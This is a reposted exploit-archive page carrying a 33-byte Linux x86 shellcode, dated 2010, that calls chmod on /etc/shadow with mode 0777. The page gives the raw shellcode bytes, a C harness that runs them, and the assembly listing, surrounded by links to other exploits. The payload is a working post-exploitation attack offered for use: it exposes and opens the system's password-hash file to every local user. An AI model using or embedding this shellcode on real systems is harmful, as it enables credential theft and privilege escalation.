首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
33 Bytes chmod("/etc/shadow", 0777) Shellcode
来源:http://plasticsouptaste.blogspot.com 作者:sm0k 发布时间:2010-04-19  

# 5m0k3.digital.3scape@gmail.com
# http://plasticsouptaste.blogspot.com
# Name: 33 bytes chmod("/etc/shadow", 0777) shellcode
# Platform: Linux x86

#include "stdio.h"

int main(int argc, char *argv[])
{

char shellcode[]
="\x31\xc0\x50\xb0\x0f\x68\x61\x64\x6f\x77\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x40\xcd\x80";

printf("Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();

return 0;
}

/*
xor %eax,%eax
push %eax
mov $0xf,%al
push $0x776f6461
push $0x68732f63
push $0x74652f2f
mov %esp,%ebx
xor %ecx,%ecx
mov $0x1ff,%cx
int $0x80
inc %eax
int $0x80

*/
--
Blog transitioéthanolique contemporain :
http://plasticsouptaste.blogspot.com/!!

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·14 Bytes execve("a->/bin/sh")
·TweakFS 1.0 (FSX Edition) Stac
·Multiple Vendor AgentX++ Stack
·AVTECH Software (AVC781Viewer.
·Windows 7/2008R2 SMB Client Tr
·Huawei EchoLife HG520c Denial
·Unauthenticated File-system Ac
·Huawei EchoLife HG520 Remote I
·Apache OFBiz FULLADMIN Creator
·29 bytes chmod("/etc/shadow",
·Apache OFBiz SQL Remote Execut
·Local kernel 2.6.2x kernel pan
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved